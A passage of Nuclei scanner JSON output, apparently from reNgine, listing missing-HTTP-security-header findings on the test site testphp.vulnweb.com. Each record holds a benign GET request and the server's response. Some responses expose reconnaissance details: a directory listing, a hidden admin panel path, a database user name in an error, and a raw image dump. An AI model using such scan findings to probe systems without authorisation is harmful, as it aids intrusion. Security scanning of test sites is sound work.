A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:04.155696057Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin\",\"path\":\"/cgi-bin\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin\",\"request\":\"GET /cgi-bin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eForbidden\\u003c/h1\\u003e\\n\\u003cp\\u003eYou don't have permission to access this resource.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:04.155712926Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"path\":\"/pictures/2.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"request\":\"GET /pictures/2.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1353\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-549\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001a\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0001\\u0003\\u0004\\u0005\\u0006\\ufffd\\ufffd\\u0000+\\u0010\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0000\\u0004\\u0007\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1AQ\\\"a\\u00142q\\ufffd\\u0005\\u0013$B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0003\\u0001\\u0002\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000'\\u0011\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0001\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1\\u0005Q\\u00132A\\\"#3aq\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffd\\ufffdd\\ufffdH䏺JU\\ufffd\\t\\u000f\\u0008\\ufffdi{\\u0015+f\\ufffd.7\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB6\\ufffd˨\\ufffd\\ufffd\\ufffd\\ufffd͒\\u001bdס\\u001a\\ufffdi\\ufffdE\\ufffdn\\ufffd_\\ufffd\\ufffd%\\u001atN\\u000c\\ufffdpR\\ufffdH\\u001d\\ufffd,֝\\ufffd\\u0000\\u0001 \\u0014\\u0000@'DQ\\u0003\\u0000Qu?b\\ufffd-\\u0010\\u0005\\ufffdL\\u0000\\u0000\\t\\u0000\\u0000\\u0000-\\u0005\\ufffd\\u0001\\ufffd\\ufffd\\u000cH\\ufffd'A\\u0015F\\ufffd\\u001a\\ufffdʔ?z3G\\ufffd^\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdK\\ufffd)\\ufffdۓ\\ufffdl\\ufffd%\\ufffd\\ufffd\\\"䨤\\ufffd\\u001f\\ufffdu\\u0015Ed44\\ufffd2\\u0005\\ufffdS\\ufffdD\\u0002Y\\u0005F\\ufffd`\\u0000\\u0000H\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\r\\u0011L`\\\"\\ufffd)4(\\u000cF\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003%C\\ufffd9\\ufffd\\ufffd1F\\ufffd$\\ufffdc$\\ufffd\\ufffd\\u000f\\ufffd~\\ufffdQ_\\ufffdק{c'K\\ufffd#\\ufffd\\ufffdr|\\ufffdR\\ufffd\\ufffd(\\ufffdԤ\\ufffdI}#;\\ufffd\\ufffdk\\ufffdʚ\\ufffd\\ufffdϳf\\ufffd\\ufffd\\ufffdEmZ\\u0010\\ufffd\\ufffd\\u0012Kȶ\\ufffdА\\ufffd\\ufffdC\\u0001Z\\u001a\\ufffdB\\u0000\\ufffd\\u0006Ҵ1I\\n\\u0004\\ufffd\\u0000X\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\ufffd\\u001com\\ufffd\\u0004\\ufffd,\\ufffd7\\u000e\\ufffd}\\ufffd\\\\1\\ufffd,\\ufffd\\u001f\\u0017\\ufffd\\ufffd#\\ufffdwG\\ufffdϫ\\ufffd\\u0016\\ufffd\\ufffd\\ufffddPf\\ufffd\\u003c\\u0013\\ufffdK\\ufffd\\ufffdG\\ufffd4j\\ufffd\\ufffd\\u001c\\ufffdi\\ufffd$\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffdj\\ufffd4C\\u000b\\ufffd\\ufffd\\ufffdg\\ufffd8\\ufffd`\\ufffd.\\ufffdΜy)\\ufffdN\\ufffd\\ufffd?\\ufffd\\ufffdj\\ufffd\\ufffd\\u001a\\ufffd*\\ufffdw\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd),\\u0012\\ufffd5b\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdg%\\ufffd\\ufffd[7e\\ufffdb\\ufffd\\u001a\\ufffd\\u0000/\\ufffd$\\ufffdfiƎ֛3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdХ\\ufffd5b\\ufffdޥ\\ufffd@%Ţ\\u0008\\u0019v\\u0000\\u0000\\u0000\\u0014E\\u0012\\u0000M\\ufffd(\\ufffd\\u0018\\u0008\\ufffdw1h\\ufffd\\ufffd(\\ufffd\\ufffd\\ufffd\\u001e\\u001a7\\ufffd\\ufffdC\\u001c\\ufffd\\ufffd\\ufffd_\\ufffd\\u000c{,\\ufffd\\ufffdَ[]\\ufffd\\ufffdkp\\ufffd\\ufffdp}\\u001d?ĹI\\ufffd\\ufffd'\\ufffd\\u0026\\ufffdjq\\ufffd\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdWO\\ufffd\\ufffd\\ufffd\\ufffdkV\\ufffd\\ufffd\\ufffd}\\u001bq\\ufffd|\\ufffdc]\\ufffdq5\\u0018\\ufffd\\ufffdp\\u0013\\ufffdJ\\ufffd\\u00003\\ufffd\\ufffd]Fhe\\ufffd\\u0018\\ufffd\\ufffdK\\ufffd4\\ufffd%r}\\ufffd\\ufffdW\\ufffd\\ufffdà\\ufffd\\ufffdd\\ufffdh\\ufffd}\\ufffd\\ufffd-\\ufffd\\\\\\ufffd\\ufffd\\u001c\\ufffdE\\ufffd\\ufffd+B\\ufffd+^\\ufffd4j\\ufffd\\ufffd\\u0004\\u0010\\ufffd}\\ufffd\\u0004\\u000cN\\ufffdqb\\ufffd\\u0000Qe?e`6\\ufffd\\u001b~Ȣې\\ufffd6߲v\\ufffd\\ufffd܄\\u0026\\ufffd\\ufffd\\u0014C\\ufffd\\ufffdJ\\ufffdx\\ufffd\\n\\u003enjlԑ\\ufffd\\ufffd5CEY\\ufffd3\\ufffd\\ufffdj=\\ufffd\\nʱ\\ufffd\\ufffdեj\\ufffdб\\ufffd\\u0000N\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffdp\\ufffd\\ufffd\\ufffdk3\\ufffd\\ufffdҾ\\ufffd9\\ufffd\\ufffd\\ufffd}3t\\ufffd\\ufffd\\ufffdψ\\ufffd2J4\\ufffdN\\rvt\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003e\\ufffdq\\ufffd%\\ufffd\\ufffd\\t\\ufffd\\ufffd\\u001fB\\ufffd\\ufffde\\ufffd\\u001bJ\\ufffd\\u001e\\ufffdQM\\\"(\\ufffd»^,]\\ufffde\\\\FG2k\\ufffdWAC\\ufffd\\r\\ufffd\\ufffd.\\ufffdbPQf\\ufffd\\ufffd\\ufffdt[^\\tP\\ufffd\\ufffdΣ\\ufffd(\\ufffd\\ufffd\\ufffd\\u00126\\ufffd6\\ufffdYlJ\\u0026\\ufffd\\ufffd\\ufffdI\\u0013D\\u003c\\ufffd\\ufffd\\ufffdd\\u0017 \\u0006\\ufffd\\ufffdp2\\ufffd\\u000e\\ufffd\\ufffdm%\\u000e6\\ufffd\\ufffd\\ufffduc\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd}\\ufffd\\ufffd\\u0000\\u001dl*⏝y\\ufffdJ\\u0019\\ufffdK\\ufffdNn\\ufffdN\\u0012x\\ufffd䋤rr%`\\u0006-W\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffdEd(\\ufffd\\u0003!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP\\ufffd8\\ufffd\\ufffdk\\ufffd\\ufffd\\u0005)\\ufffd?,\\u0000+\\ufffd\\ufffd\\ufffd;5\\u0012\\ufffd\\u000c2\\ufffd\\ufffd\\ufffd+\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u0000e\\ufffd2\\ufffd\\t7\\ufffd6-\\\"v\\ufffd\\u0001f\\ufffdd\\ufffd\\u0026ͺXA\\ufffd\\ufffd\\ufffdSh\\u0000~\\ufffd\\\\\\ufffdW\\ufffd\\ufffd\\ufffd%O\\ufffd\\ufffdr\\ufffd\\ufffdc\\u0014\\ufffd\\u0004\\u003eΌ\\u001b\\ufffdCHe\\u0014\\u0000\\u0008\\ufffd\\ufffd\\u0007\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:04.721406412Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"request\":\"GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:04.721446276Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:04.721488664Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts\",\"path\":\"/_mmServerScripts\",\"matched-at\":\"http://testphp.vulnweb.com/_mmServerScripts/\",\"request\":\"GET /_mmServerScripts HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /_mmServerScripts/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /_mmServerScripts/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"MMHTTPDB.php\\\"\\u003eMMHTTPDB.php\\u003c/a\\u003e 11-May-2011 10:27 2111\\r\\n\\u003ca href=\\\"mysql.php\\\"\\u003emysql.php\\u003c/a\\u003e 11-May-2011 10:27 10634\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:05.456569276Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l\",\"path\":\"/bxss/adminPan3l\",\"matched-at\":\"http://testphp.vulnweb.com/bxss/adminPan3l/\",\"request\":\"GET /bxss/adminPan3l HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chead\\u003e\\n \\u003ctitle\\u003eAdministrative panel\\u003c/title\\u003e \\n \\u003clink rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"style.css\\\"\\u003e \\n\\u003c/head\\u003e\\n \\n\\u003cbody\\u003e\\n\\u003cp\\u003e \\n \\u003ccenter\\u003e\\n \\u003cimg src=\\\"http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\n \\u003ch2\\u003eAdministrative Panel\\u003c/h2\\u003e\\n \\u003c/center\\u003e\\n\\u003c/p\\u003e \\n \\n\\u003cb\\u003eLast 100 visitors on this site\\u003c/b\\u003e\\n\\n\\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\\n\\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\\nWebsite is out of order. Please visit back later. Thank you for understanding.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:05.45659017Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testphp.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:05.456629432Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 